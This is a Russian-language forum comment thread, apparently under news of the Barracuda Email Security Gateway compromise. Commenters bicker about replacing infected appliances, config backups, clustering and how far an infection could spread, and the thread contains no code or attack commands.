> Будешь всю 0.0.0.0/0 и ::/0 аудитить? Успехов.Я тоже не прочь увидеть как кого-то чрезмерно самоуверенного заслуженно трахнут - поэтому вот небольшой хинт атакуюшим: перебор каким-нибудь zmap'ом всего IPv4 даже на на гигабите занимает менее суток. Поэтому аудит всего /0 - внезапно, вариант.
АУДИТ, а не перебор zmap'ом. Вот сразу и видно, кто с чем знаком.
> АУДИТ, а не перебор zmap'ом. Вот сразу и видно, кто с чем знаком.Ну так сначала Zmap'ом находятся "promising targets" - в том числе и "все что похоже на барракуду в интернете". А потом им можно устроить уже более предментный "аудит" :). И вот откуда такая ломовая уверенность что вы одним из этих target'ов не будете, если на публичном айпи голым задом вывесить - кто б его знает.
Ну а уж более информированый атакующий которому не вломак разобраться кто вы и откуда примерно лезете - сможет и как минимум конкретный AS прикинуть и там уже куда прицельнее гасить.
А У Д И Т
Ладно, до конца подскажу :)
Выбирайте самый простой вариант: конфигурим одну новую заранее. Далее включаем ей в кластер все остальные новые, их конфигурация как раз и упирается в скорость прокликивания, 99% конфига придёт с кластера.
Далее в течение минуты перекидываем балансер на новые железки, а старые гасим.
Так понятнее?
обычная работа. Еще и по некритичному сервису, пол-часа без почты или резервным релеем где-то в щебенях поднятым специально для этой цели почти любая контора может пережить.А если для вас это страшный и ужасный геморрой, одну коробку из стойки выкинуть, другую закатать и, может быть, накатить конфиг если кластер уже не кластер а рассадник троянов (надеюсь конфиг у вас все же где-то был) - можете в пресейлы подаваться. Потому что начальство скоро кое о чем догадается.
А могли поставить съемный spi чип в дипоском корпусе в распаянную на плате кроватку установить.
Какой блджад SPI чип. Какая кроватка. Там обычный x86 внутри. С SSD/HDD и поэтессами.
А кровати переставлять вообще поздно в этом случае.Меняют потому, что степень внедрения не понятна, а фирмварь полного образа ОС из себя не представляет.
>фирмварь полного образа ОС из себя не представляет.Чего она не представляет?
Если там обычный hdd/ssd, пройтись по ним обычным dd, залив образ, который предоставит контора. Нет, для тех у кого лапки, можно и прислать устройства вендору, как элемент маркетинга ход стандарте, хорош и понятен.
Я уж подумал, там всё серьёзно, что-то на уровне пробоин efi.
Ну давай, пройдись мне dd по железке, которая не даёт тебе полноценной консоли. А открыть корпус = слететь с гарантии. Это тебе не твой гаражик с ржавой шахой.
Тоже мне бентли нашлась, лол.
ПС: почистил и промыл карб шахи - и пошёл резать пятаки и давать угла.
Ну там реально чего угодно может быть после порутания.
Но обычным dd по ним никак не пройтись, железка вендорская, консоли нет.
Зачем? Дополнительные компоненты, кастомное железо, необходимость вскрывать корпус для замены, ESD-защита, квалификация персонала, и, главное, время. Раз уж апплаенс надо из стойки вынимать, то проще новый туда вставить, чем SPI отвёрткой из кроватки выковыривать. UPS доставит новую железку в течение 24 часов. Через 48 часов твой ещё чуть тёплый рутованный гейт будет у вендора в лаборатории на стенде ждать инженеров для анализа. А через пару месяцев может даже будет стоять в другой стойке у другого клиента после перепрошивки.
"Email Security Gateway"
Это файрвол отдельно для почтового сервера, а не для всей сети компании. Хотя у барракуд на странице компании гордо висит "91% of cyberattacks start with an email".
Зато честно, LOL. :)
TrustRadius Top Rated for 2023, 8.9/10 - просто топчик, верим ни разу не проплаченному рейтингу, угу."The vulnerability existed in a module which initially screens the attachments of incoming emails."
SALTWATER, SEASIDE - modules for the Barracuda SMTP daemon.
SMTP протокол изначально создавался в древние времена, когда вообще не предполагали злоупотребления, но для функционала и секьюрности навернули поверх дополнений, и это, разумеется, решив ряд вопросов, создало еще больше возможностей для проникновения.SEASPY is an x64 ELF persistence backdoor.. monitoring traffic on port 25 (SMTP) and port 587.. path: /sbin/
Ай, молодцы, барракуды, мало им было проблем с SMTP, так еще и бэкдоры свои впихнули в дистр Linux.решение "to obtain a new ESG virtual or hardware appliance."
Ну хоть если у кого этот файрвол для почтовика крутится на виртуалке, то "всего лишь" переустановить и настроить по-новой виртуалку, а не менять железку. (про версии для AWS/Azure барракуды молчат)
> решение "to obtain a new ESG virtual or hardware appliance."
> Ну хоть если у кого этот файрвол для почтовика крутится на виртуалке,
> то "всего лишь" переустановить и настроить по-новой виртуалку, а не менятьбэкапы конфига, извиняюсь за грубость, делать не принято? Ну пусть настроят, наверняка услуги настройщика тоже входят в саппорт. А контора недельку посидит без почты... зачем она...
> железку. (про версии для AWS/Azure барракуды молчат)
так пусть amazon переустанавливает, для того и брали ведь
Ды там кластеринг есть, 99% конфига синхронизируются. Если у кого-то железка одна - ну, ссзб.
> Ды там кластеринг есть, 99% конфига синхронизируются.ну фиг знает, стоит ли синхронизироваться с зараженным кластером, но в целом тоже не должно быть особой проблемы восстановить конфиг первой из железок а остальное уже в спокойном режиме поштучно синхронизировать.
Ну а кто не может или не имел бэкапов конфигурации - того и не очень жаль.
Не, синхронизироваться можно с новой машиной, образующей новый кластер. Процесс поднятия понимаемо ускоряется :)
ты вообще не понял масштаб кабздеца. Заражается ESG через бэкдор, подгружаются левые демоны SMTP, от EGS заражается почтовый сервак, который ESG по-идее защищает, и понеслось заражение через email всех кто в базе почтовика.
И тут вопрос, а КАК понять вообще КОГДА произошло заражение, т.е. какие бэкапы можнно спокойно накатывать на все?
А если там, эээ, инкубационный период и ты такой, о, 25 мая началась ненормальная активность, значит накатываем бэкапы от 24го. А заражение произошло на самом деле еще раньше. Только ты заменил EGS на новый, вычистил все серваки компании, десктопы клиентов, все, что в облаках, разослал всем кто в почтовой базе извинения-предупреждения, спал неделю по пару часиков урывками, и фигак, у тебя понеслось все по-новой, потому что бэкап, который должен быть норм, оказался тоже зараженный.
Так можно и работу потерять.
> ты вообще не понял масштаб кабздеца. Заражается ESG через бэкдор, подгружаются левые
> демоны SMTP, от EGS заражается почтовый сервак, который ESG по-идее защищает,если у тебя почтовый сервер может чем-то там заразиться от совершенно несовместимой железки - тебе уже не надо так много работать, сходи проветрись.
> и понеслось заражение через email всех кто в базе почтовика.
чем заражение? В базе почтовика обычные пользователи, у них нет "qx"
> И тут вопрос, а КАК понять вообще КОГДА произошло заражение, т.е. какие
> бэкапы можнно спокойно накатывать на все?бэкапы - чего? Бэкапы конфига можешь любые накатывать - это, чорд побери - КОНФИГ.
> Так можно и работу потерять.
да, с твоими талантами - легко.
выше я отметил про SMTP из ориг.статьи. А то "несовм.железка" и пошло-поехало домысливание.
"тебе уже не надо так много работать, сходи проветрись" - пошло советское хамство, переход на личности.
пох такой пох, разговор закончен.
На счет конфигов - в современные конфиги некоторые умники очень любят встраивать поддержку скриптовых языков. То есть по факту мы имеем вместо старого, доброго тупого конфига - некий скрипт на sh/lua/PHP/etc...
А встроить в такой конфиг заразу - дело техники...
Я Barracuda последний раз видел в 2015-6 году, на пямять - еЯ конфиг просто богомерзкий XML ... Не надо фантазий там где не надо.
>ты вообще не понял масштаб кабздеца.ORLY?! ;-)
>Заражается ESG через бэкдор, подгружаются левые демоны SMTP, от EGS заражается почтовый сервак, который ESG по-идее защищает, и понеслось заражение через email всех кто в базе почтовика.Вот в этом месте - подробнее, с тех. деталями. Раскрой механизм дейста, ЫнжеНегище! :)
PS: Как думаете - сольётся?
Да фиг ли там раскрывать.
Заражается ESG, сканит сеть, ломает протухшую винду с сексченджем, начинает юзерам письма счастья рассылать (я ваш енженегр, загрузите вот этот файлик срочно иначе документы будут потеряны).
Другое дело что на практике так случается не часто :D
:)
Там два порта обычно открыто до инлета Ыксчейдного - почта и директорий.PS: О! Погодь!
Это ты к тому что у тебя баракуда и Ыксчейндж НЕ по разные стороны фаервола?!? 8-о
И так бывает? А ... Понял ... УХ! ... 8-)
У половины рогов и копыт именно так и бывает :D
Одна сторона в паблике, другая в локалке.
У меня вообще немножко по-другому, но да, случай типовой.
Никогда такого не было и вот опять)))
Чего там можно сделать с ошибкой было?